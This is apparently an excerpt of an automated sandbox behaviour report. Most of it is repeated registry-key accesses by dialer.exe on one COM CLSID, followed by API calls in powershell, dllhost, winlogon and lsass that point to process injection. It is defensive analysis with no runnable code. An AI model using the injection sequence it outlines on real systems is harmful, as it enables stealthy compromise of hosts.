Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Jump to behavior |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0FE4 NtResumeThread, |
28_2_00007FFD9B8B0FE4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADF98 NtUnmapViewOfSection, |
28_2_00007FFD9B8ADF98 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0F20 NtSetContextThread, |
28_2_00007FFD9B8B0F20 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0C5D NtWriteVirtualMemory, |
28_2_00007FFD9B8B0C5D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0A3E NtUnmapViewOfSection, |
28_2_00007FFD9B8B0A3E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AE078 NtUnmapViewOfSection, |
28_2_00007FFD9B8AE078 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_0000000140001394 NtOpenKey, |
64_2_0000000140001394 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B1004 NtResumeThread, |
66_2_00007FFD9B8B1004 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0F40 NtSetContextThread, |
66_2_00007FFD9B8B0F40 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0C7D NtWriteVirtualMemory, |
66_2_00007FFD9B8B0C7D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE0C8 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE0C8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0A5E NtUnmapViewOfSection, |
66_2_00007FFD9B8B0A5E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE098 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE098 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE0A8 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE0A8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, |
68_2_0000000140001860 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC642990 NtEnumerateValueKey,NtEnumerateValueKey, |
69_2_00000225DC642990 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE2604 NtQueryDirectoryFileEx,GetFileType,StrCpyW, |
70_2_00000202C0AE2604 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE211C NtQuerySystemInformation,StrCmpNIW, |
70_2_00000202C0AE211C |
Source: C:\Windows\System32\dwm.exe |
